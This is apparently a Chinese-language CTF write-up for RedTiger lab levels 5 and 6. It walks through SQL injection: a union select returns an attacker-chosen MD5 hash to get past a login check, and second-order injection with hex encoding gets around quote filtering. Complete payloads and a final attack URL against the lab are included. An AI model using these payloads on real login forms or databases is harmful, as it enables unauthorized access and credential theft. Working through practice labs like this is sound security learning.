level5
提示password被md5加密了,还要观察login errors
账号密码乱输,回显User not found!
账号输入' or 1=1 #,密码乱输,回显Login failed!
说明有两层验证,第一层是验证是否有返回值的
盲猜(?)后端逻辑如下
if(select xxx from xxx where username='pay1'有返回值){
psw=(select password from xxx where username='pay1');※
if(md5(pay2)==psw){冲冲冲}
}
思路:让※中的语句选出md5(pay2)
1.第一层验证
分别输入
select username,password from xxx where username='' union select 1 #
select username,password from xxx where username='' union select 1,2 #
分别回显
Login failed!
User not found!
说明payload' union select 1,2 #可以bypass
2.第二层验证
select password from xxx where username='' union select 1,md5('fuck') #
select password from xxx where username='' union select md5('fuck'),2 #
都试一遍,事实上第一条可以bypass
最终payload:账号' union select 1,md5('fuck') #,密码fuck
level6(二次注入+16进制绕过)
常规操作,order+union select,然后会在这一步卡住
?user=-1 union select 1,2,3,4,5 #回显User not found
尝试用给定的用户名'deddlef'替换1,2,3,4,5,都回显User not found,猜测引号过滤。所以把deddlef转16进制为0x646564646c6566,替换1,2,3,4,5,替换到2的时候正常回显
所以可以在2处二次注入(以下语句实际上要转16进制):
' union select 1,2,3,4,5#
' union select 1,Username,3,Password,5 from level6_users where status=1 limit 0,1#
最终payload:
http://redtiger.labs.overthewire.org/level6.php?user=-1 union select 1,0x2720756e696f6e2073656c65637420312c557365726e616d652c332c50617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d31206c696d697420302c3123,3,4,5 #
后记:sql注入真好玩,虽然每题都要看wp呜呜呜
